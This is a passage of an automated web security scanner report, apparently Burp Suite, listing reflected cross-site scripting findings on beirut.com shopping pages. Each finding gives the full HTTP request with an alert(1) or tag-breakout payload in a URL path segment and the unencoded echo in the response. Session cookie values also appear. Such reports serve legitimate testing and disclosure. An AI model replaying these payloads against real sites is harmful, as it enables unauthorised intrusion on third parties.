Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Specialized-Stores/2572668008

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6737'-alert(1)-'5e490f3ea1e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Specialized-Storesa6737'-alert(1)-'5e490f3ea1e/2572668008 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:55:39 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Specialized-Storesa6737'-alert(1)-'5e490f3ea1e';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1072. http://www.beirut.com/Shopping/Stores-Markets/3546182765 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Stores-Markets/3546182765

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2f97"><a>d9cc57a373c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppingb2f97"><a>d9cc57a373c/Stores-Markets/3546182765 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:52:46 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppingb2f97"><a>d9cc57a373c">
...[SNIP]...

4.1073. http://www.beirut.com/Shopping/Stores-Markets/3546182765 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Stores-Markets/3546182765

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a26ff'-alert(1)-'0a504d2863 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shoppinga26ff'-alert(1)-'0a504d2863/Stores-Markets/3546182765 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:02:26 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shoppinga26ff'-alert(1)-'0a504d2863/Stores-Markets';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1074. http://www.beirut.com/Shopping/Stores-Markets/3546182765/Department-Store/68 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Stores-Markets/3546182765/Department-Store/68

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78c1c'-alert(1)-'d145a633f7e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping78c1c'-alert(1)-'d145a633f7e/Stores-Markets/3546182765/Department-Store/68 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:04:41 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping78c1c'-alert(1)-'d145a633f7e/Stores-Markets/3546182765/Department-Store/68';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1075. http://www.beirut.com/Shopping/Stores-Markets/3546182765/Department-Store/68 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Stores-Markets/3546182765/Department-Store/68

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d47e"><a>acdaeb12181 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping5d47e"><a>acdaeb12181/Stores-Markets/3546182765/Department-Store/68 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:53:05 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping5d47e"><a>acdaeb12181">
...[SNIP]...

4.1076. http://www.beirut.com/Shopping/Stores-Markets/3546182765/MiniMarket/75 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Stores-Markets/3546182765/MiniMarket/75

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b4072'-alert(1)-'8bf252c2f0a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shoppingb4072'-alert(1)-'8bf252c2f0a/Stores-Markets/3546182765/MiniMarket/75 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:58:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shoppingb4072'-alert(1)-'8bf252c2f0a/Stores-Markets/3546182765/MiniMarket/75';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1077. http://www.beirut.com/Shopping/Stores-Markets/3546182765/MiniMarket/75 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Stores-Markets/3546182765/MiniMarket/75

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1422d"><a>e29aae621eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping1422d"><a>e29aae621eb/Stores-Markets/3546182765/MiniMarket/75 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:48:52 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping1422d"><a>e29aae621eb">
...[SNIP]...

4.1078. http://www.beirut.com/Shopping/Stores-Markets/3546182765/MiniMarket/75 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Stores-Markets/3546182765/MiniMarket/75

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef7af'-alert(1)-'a4c5d786ed4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Stores-Marketsef7af'-alert(1)-'a4c5d786ed4/3546182765/MiniMarket/75 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:04:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57785

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Stores-Marketsef7af'-alert(1)-'a4c5d786ed4/3546182765/MiniMarket/75';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1079. http://www.beirut.com/Shopping/Stores-Markets/3546182765/MiniMarket/75 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Stores-Markets/3546182765/MiniMarket/75

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 77a97<script>alert(1)</script>0c7a555e2b3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Stores-Markets77a97<script>alert(1)</script>0c7a555e2b3/3546182765/MiniMarket/75 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:05:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Stores Markets77a97<script>alert(1)</script>0c7a555e2b3 <a href="#" id="backlink">
...[SNIP]...

4.1080. http://www.beirut.com/Shopping/Stores-Markets/3546182765/Supermarket/63 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Stores-Markets/3546182765/Supermarket/63

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 256b2"><a>67ef445c9a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping256b2"><a>67ef445c9a4/Stores-Markets/3546182765/Supermarket/63 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:38:03 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping256b2"><a>67ef445c9a4">
...[SNIP]...

4.1081. http://www.beirut.com/Shopping/Stores-Markets/3546182765/Supermarket/63 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Stores-Markets/3546182765/Supermarket/63

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a90d'-alert(1)-'a542c436cba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping3a90d'-alert(1)-'a542c436cba/Stores-Markets/3546182765/Supermarket/63 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:45:28 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping3a90d'-alert(1)-'a542c436cba/Stores-Markets/3546182765/Supermarket/63';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1082. http://www.beirut.com/Shopping/Stores-Markets/3546182765/Supermarket/63 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Stores-Markets/3546182765/Supermarket/63

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53fc3'-alert(1)-'54c431413ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Stores-Markets53fc3'-alert(1)-'54c431413ae/3546182765/Supermarket/63 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:51:09 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Stores-Markets53fc3'-alert(1)-'54c431413ae/3546182765/Supermarket/63';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1083. http://www.beirut.com/Shopping/Stores-Markets/3546182765/Supermarket/63 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Stores-Markets/3546182765/Supermarket/63

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 14623<script>alert(1)</script>10ab5659ae6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Stores-Markets14623<script>alert(1)</script>10ab5659ae6/3546182765/Supermarket/63 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:51:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Stores Markets14623<script>alert(1)</script>10ab5659ae6 <a href="#" id="backlink">
...[SNIP]...

4.1084. http://www.beirut.com/Shopping/Stores-Markets/3546182765/Supermarket/63 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Stores-Markets/3546182765/Supermarket/63

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3352'-alert(1)-'1987268ce2a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Stores-Markets/3546182765b3352'-alert(1)-'1987268ce2a/Supermarket/63 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
